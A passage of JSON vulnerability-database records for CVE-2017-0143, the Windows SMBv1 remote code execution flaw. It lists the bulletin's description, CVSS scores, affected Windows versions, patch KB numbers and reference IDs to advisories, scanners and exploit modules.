"idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-18T02:48:09", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-18T02:48:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB4012212", "KB4012213", "KB3210721", "KB4013198", "KBMS16-110, 3187754", "KB4012606", "KB3205409", "KB4012217", "KB3205401", "KB3212646", "KB4013429", "KB4012215", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:48:09", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-18T18:44:54", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-18T18:44:54", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-18T18:44:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:54", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T00:58:24", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T00:58:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T00:58:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3205409", "KB4012212", "KB4012213", "KB3212646", "KB3210720", "KB3177186", "KB4012606", "KB4012214", "KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4013429", "KB4012598", "KB4013198", "KB3205401", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", 